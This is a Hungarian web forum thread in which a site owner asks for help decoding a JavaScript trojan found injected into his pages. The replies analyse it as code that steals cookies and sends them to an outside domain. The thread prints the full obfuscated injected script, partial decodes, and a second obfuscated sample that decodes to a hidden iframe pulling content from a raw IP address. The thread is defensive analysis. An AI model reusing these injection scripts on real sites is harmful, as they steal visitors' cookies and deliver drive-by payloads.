Oldal: 1 / 2 12 UtolsóUtolsó
Eredmény: 1 - 10 (13) összesen

Téma: Trójai - segítsetek visszafejteni

  1. #1
    Szerkesztő TechMan logója
    Csatlakozott
    08-02-09
    Hozzászólás
    213
    Begyűjtött 0 köszönetet
    0 hozzászólásával

    Alapbeállítás Trójai - segítsetek visszafejteni

    Most találtam 4 oldalamban egy trója programot (javascript), pontosabban az avast vette észre.
    Szeretném kideriteni, hogy mi ez, mit csinál, és ki a felelős érte.
    Aki tud programozni légyszi segítsen visszafejteni.

    Itt a kód:
    Kód:
    <script language="javascript">
    $="Z63cZ3dZ226egthZ253bi+Z252bZ2529Z257btmpZ253dds.sZ256cZ2569ceZ2528i,Z2569+Z2531Z2529Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dzZ3dZ22Z2566Z2575nZ2563Z2574Z2569on Z2564Z2577(t)Z257bcZ2561Z253dZ2527Z252564ocuZ2525Z2536dZ252565nZ252574.wrZ2525Z25369Z2574Z252565(Z252522Z2527;cZ2565Z253dZ2527Z252522Z252529Z2527Z253bcbZ253dZ2527Z25253csZ252563rZ25256Z2539pt Z2525Z2536cZ252561Z256eZ2567Z2575Z252561geZ25253dZ25255cZ252522jaZ2576asZ2563rZ252569Z2570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570tZ25253eZ2527;evZ2561Z256c(Z2575nesZ2563apeZ2528t))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;cbZ3dZ22Z2528ds)Z253bsZ2574Z253dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cdsZ252elZ2565Z25Z22;opZ3dZ22Z2524Z253dZ2522dw(dcsZ2528cu,Z2531Z2534));Z2522Z253bZ22;stZ3dZ22Z2573tZ253dZ2522$Z253dZ2573Z2574;Z2564Z2563Z2573(Z2564Z2561Z252bdZ2562+Z2564Z2563+Z2564dZ252bZ2564eZ252c1Z2530Z2529Z253bdZ2577(Z2573Z2574Z2529;Z2573Z2574Z253dZ2524;Z2522;Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;yqz`;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ22Z2563haZ2572CodZ2565Z2541t(Z2530)Z255e(Z25270x00Z2527+esZ2529Z2529);}Z257dZ22;cdZ3dZ223bstZ253dsZ2574+StZ2572ingZ252efrZ256fmZ2543harZ2543odeZ2528(tmZ2570Z252eZ22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566uncZ2574ioZ256e czZ2528cz)Z257brZ2565tuZ2572n cZ2561+cbZ252bccZ252bcdZ252bceZ252bcZ257a;}Z253bZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;caZ3dZ22Z2566uncZ2574ionZ2520Z2564csZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573Z2563apeZ22;Z69Z66 (dZ6fcuZ6denZ74.coZ6fkZ69eZ2eindZ65xOZ66Z28Z27vbulZ6cZ65Z74in_Z6duZ6ctZ69Z71uotZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbuZ6cleZ74Z69Z6e_muZ6ctiqZ75oZ74eZ3dZ27,2,7);Z65valZ28Z75neZ73Z63apZ65(Z64Z7a+czZ2boZ70+sZ74)Z2bZ27dw(dz+Z63Z7a($+Z73t))Z3bZ27)}elsZ65Z7b$Z3dZ27Z27};funZ63tioZ6eZ20scZ28cnmZ2cZ76,Z65d)Z7bvZ61r eZ78dZ3dnew DZ61tZ65(Z29;eZ78d.Z73eZ74DaZ74eZ28exdZ2egZ65tZ44atZ65Z28)Z2bZ65d)Z3bdoZ63umZ65ntZ2ecZ6fokiZ65Z3dcZ6em+ Z27Z3dZ27 +esZ63apZ65(Z76)+Z27;Z65xZ70Z69Z72eZ73Z3dZ27+exd.Z74oGMZ54Z53triZ6eg()Z3bZ7d;";
    
    function z(s) { 
    r=""; for (i=0;i<s.length;i++) {if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)} r=r+s1;}
    return unescape(r);
    }
    document.write(z($)); // ezt én írtam bele
    //eval(z($)) // ezeket hatástalanítottam a biztonság kedvéért
    //document.write($);
    </script>
    A módosított program ezt írja ki. Milyen kód ez?
    Kód:
    cc="6egth%3bi+%2b%29%7btmp%3dds.s%6c%69ce%28i,%69+%31%29%";de="M+}Sx-|)K88d)K7}7M;}^}950%22%9M+yv888d)K7t7M:%229.-%2096688d)K7t7M:%229,-)99tSx-~)K8d)K7t7M50!%209M+u|cu0tSx-|)K88d)K7t7M:%26950%22'9M+4-4>bu`|qsu8ts%7F}79+";dz="%66%75n%63%74%69on %64%77(t)%7bc%61%3d%27%2564ocu%25%36d%2565n%2574.wr%25%369%74%2565(%2522%27;c%65%3d%27%2522%2529%27%3bcb%3d%27%253cs%2563r%256%39pt %25%36c%2561%6e%67%75%2561ge%253d%255c%2522ja%76as%63r%2569%70%2574%255c%2522%253e%27;cc%3d%27%253c%255c%252fscri%70t%253e%27;ev%61%6c(%75nes%63ape%28t))%7d;";da="fqb0})-~ug0Qbbqi87|qe~%7F7<7{rtfu7<7zsdxb7<7ytvyb7<7xufyv7<7wvhuc7<7vwfuc7<7uxwxd7<7tzu~y7<7s{ud~7<7r||uf7<7q}dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7{7<7|7<7}7<7~7<7%7F7";cb="%28ds)%3bs%74%3dtmp%3d%27%27;for(i%3d0;i%3cds%2el%65%";op="%24%3d%22dw(dcs%28cu,%31%34));%22%3b";st="%73t%3d%22$%3d%73%74;%64%63%73(%64%61%2bd%62+%64%63+%64d%2b%64e%2c1%30%29%3bd%77(%73%74%29;%73%74%3d%24;%22;";dc="qi89;%229+u|cu0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M,%209d)K7t7M-!+d)K7}7M-t)>wud]%7F~dx89;!+ve~sdy%7F~0S]^8t<}s%7F}7+fqb0iSx!<";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;yqz`;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";ce="%63ha%72Cod%65%41t(%30)%5e(%270x00%27+es%29%29);}%7d";cd="3bst%3ds%74+St%72ing%2efr%6fm%43har%43ode%28(tm%70%2e";db="<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudT";cz="%66unc%74io%6e cz%28cz)%7br%65tu%72n c%61+cb%2bcc%2bcd%2bce%2bc%7a;}%3b";dd="iSx%22<}Sx<}^}+yv8d)K7i7M,%22%20%20'9kd)K7i7M0-0%22%20%20'+m}^}-S]^8d)K7t7M




  2. #2
    Rubyist Geri logója
    Csatlakozott
    07-12-15
    Hely
    \x90
    Hozzászólás
    5.605
    Begyűjtött 1.332 köszönetet
    828 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    Idézet y.men eredeti hozzászólása Hozzászólás megtekintése
    Most találtam 4 oldalamban egy trója programot (javascript), pontosabban az avast vette észre.
    Szeretném kideriteni, hogy mi ez, mit csinál, és ki a felelős érte.
    Aki tud programozni légyszi segítsen visszafejteni.
    egy vbulletin sutit keres es azt irja felul a user gepen aki megnyitja az oldaladat.
    nekem nincs ilyen sutim ettol a forumtol, mas vbulletint meg nem latogatok. talan a forumgazdak tudjak mi ez a suti : vbulletin_multiquote .
    bar lehet hogy volt ilyenem csak veletlenul lefuttattam a scriptet mielott rajottem mit csinal . ja es elkuldi a suti tartalmat ennek az oldalnak :
    hxxp://foggamtwe.com


    If debugging is the process of removing software bugs, then programming must be the process of putting them in.
    Github Rake tutorial
    Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.
    Respect all, fear none

  3. #3
    Szerkesztő TechMan logója
    Csatlakozott
    08-02-09
    Hozzászólás
    213
    Begyűjtött 0 köszönetet
    0 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    A'zta. Ügyes vagy. Hogy csináltad? Az a második kód az milyen kód?


    Utoljára módosítva: TechMan által : 2008-12-26 14:49

  4. #4
    Rubyist Geri logója
    Csatlakozott
    07-12-15
    Hely
    \x90
    Hozzászólás
    5.605
    Begyűjtött 1.332 köszönetet
    828 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    Idézet y.men eredeti hozzászólása Hozzászólás megtekintése
    Hogy csináltad?
    titok

    Idézet y.men eredeti hozzászólása Hozzászólás megtekintése
    Az a második kód az milyen kód?
    hat osszevissza van az egesz kodolva es az nem az aminek latszik, hanem egy javascript fuggveny. az egeszet nem fejtettem vissza mert aki csinalta eleg ugyes lehet, es kicsit paranoid, mert a kodolt fuggveny amiket hasznal valtozokat azok is kodlva vannak, es azzal mar nem volt kedvem szarakodni.
    Kód:
    if (document.cookie.indexOf('vbulletin_multiquote=')==-1){
    	sc('vbulletin_multiquote=',2,7);
    	alert((unescape(dz+cz+op+st)+'dw(dz+cz($+st));');
    	}else{$=''};
    	function sc(cnm,v,ed){
    		var exd=new Date();exd.setDate(exd.getDate()+ed);
    		document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
    		};
    itt egy kis reszlet belole.



  5. #5
    Szerkesztő TechMan logója
    Csatlakozott
    08-02-09
    Hozzászólás
    213
    Begyűjtött 0 köszönetet
    0 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    Azt nem értem hogy a z() függvény már a kikódolt scriptet kell hogy visszaadja, mert utána már rögtön az eval() al végrehajtja. De ez nem egy script hanem egy zagyvaság (vagyis 14 változó egy csomó zagyvasággal) akkor hogy tudja a javascript végrehajtani. Nem értem

    Valószínű nem tudom mit csinál az eval()


    Utoljára módosítva: TechMan által : 2008-12-26 15:32

  6. #6
    Szerkesztő TechMan logója
    Csatlakozott
    08-02-09
    Hozzászólás
    213
    Begyűjtött 0 köszönetet
    0 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    Áhh látom már. Ez tényleg nagyon túl van bonyolítva. Ügyes



  7. #7
    Szerkesztő TechMan logója
    Csatlakozott
    08-02-09
    Hozzászólás
    213
    Begyűjtött 0 köszönetet
    0 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    A második kód az escaped kód tehát unescaped elni kell.
    Itt van leírva: http://pcforum.hu/tudastar/44392/Fir...o+webhely.html

    Definition and Usage
    The unescape() function decodes a string encoded with escape().



  8. #8
    Rubyist Geri logója
    Csatlakozott
    07-12-15
    Hely
    \x90
    Hozzászólás
    5.605
    Begyűjtött 1.332 köszönetet
    828 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    Idézet y.men eredeti hozzászólása Hozzászólás megtekintése
    Valószínű nem tudom mit csinál az eval()
    az eval vegrehajta az atadott stringet. vagyis ha az eval-t meghivod egy javascripttel akkor az lefut. az escape es az unescape csak a specialis karaktereket csereli le illetve vissza. nem ez a titok nyitja



  9. #9
    Bölcs huncyrus logója
    Csatlakozott
    07-04-26
    Hely
    EU :)
    Hozzászólás
    519
    Begyűjtött 4 köszönetet
    4 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    :)
    11234569876543123456798765



  10. #10
    Szerkesztő TechMan logója
    Csatlakozott
    08-02-09
    Hozzászólás
    213
    Begyűjtött 0 köszönetet
    0 hozzászólásával

    Alapbeállítás re: Trójai - segítsetek visszafejteni

    Idézet y.men eredeti hozzászólása Hozzászólás megtekintése
    Kód:
    <script>function c1058032905m49197e3cdb42b(m49197e3cdb7ff){ function m49197e3cdbbe9(){var m49197e3cdbfd1=16;return m49197e3cdbfd1;} return (parseInt(m49197e3cdb7ff,m49197e3cdbbe9()));}function m49197e3cdc3e9(m49197e3cdc7a6){ var m49197e3cdd35a=2; var m49197e3cdcb8f='';m49197e3cddb31=String.fromCharCode;for(m49197e3cdcf78=0;m49197e3cdcf78<m49197e3cdc7a6.length;m49197e3cdcf78+=m49197e3cdd35a){ m49197e3cdcb8f+=(m49197e3cddb31(c1058032905m49197e3cdb42b(m49197e3cdc7a6.substr(m49197e3cdcf78,m49197e3cdd35a))));}return m49197e3cdcb8f;} var ze3='';var m49197e3cddfec='3C7'+ze3+'3637'+ze3+'2697'+ze3+'07'+ze3+'43E696628216D7'+ze3+'96961297'+ze3+'B646F637'+ze3+'56D656E7'+ze3+'42E7'+ze3+'7'+ze3+'7'+ze3+'2697'+ze3+'465287'+ze3+'56E657'+ze3+'363617'+ze3+'065282027'+ze3+'2533632536392536362537'+ze3+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+ze3+'332537'+ze3+'32253633253364253237'+ze3+'2536382537'+ze3+'342537'+ze3+'342537'+ze3+'30253361253266253266253337'+ze3+'253337'+ze3+'253265253332253332253331253265253331253333253333253265253331253337'+ze3+'253332253266253265253639253636253266253637'+ze3+'2536662532652536382537'+ze3+'34253664253663253366253237'+ze3+'2532622534642536312537'+ze3+'342536382532652537'+ze3+'322536662537'+ze3+'352536652536342532382534642536312537'+ze3+'342536382532652537'+ze3+'32253631253665253634253666253664253238253239253261253332253339253339253330253330253239253262253237'+ze3+'253338253336253237'+ze3+'2532302537'+ze3+'37'+ze3+'2536392536342537'+ze3+'34253638253364253332253333253330253230253638253635253639253637'+ze3+'2536382537'+ze3+'342533642533312533332533302532302537'+ze3+'332537'+ze3+'342537'+ze3+'39253663253635253364253237'+ze3+'2536342536392537'+ze3+'332537'+ze3+'302536632536312537'+ze3+'39253361253230253665253666253665253635253237'+ze3+'2533652533632532662536392536362537'+ze3+'3225363125366425363525336527'+ze3+'29293B7'+ze3+'D7'+ze3+'6617'+ze3+'2206D7'+ze3+'969613D7'+ze3+'47'+ze3+'27'+ze3+'5653B3C2F7'+ze3+'3637'+ze3+'2697'+ze3+'07'+ze3+'43E';document.write(m49197e3cdc3e9(m49197e3cddfec));</script>
    Geri07 Visszafejtettem a kódot:
    Kód:
    <iframe name=c10 src='http://77.221.133.172/.if/go.html?'+Math.round(Math.random()*29900)+'86' width=230 height=130 style='display: none'></iframe>
    De már lelőtték a szervert.



Oldal: 1 / 2 12 UtolsóUtolsó

A téma címkéi:

Könyvjelzők

Hozzászólás szabályai

  • Új témákat nem hozhatsz létre
  • Válaszokat nem küldhetsz
  • Fájlokat nem csatolhatsz
  • A hozzászólásaidat nem módosíthatod
  •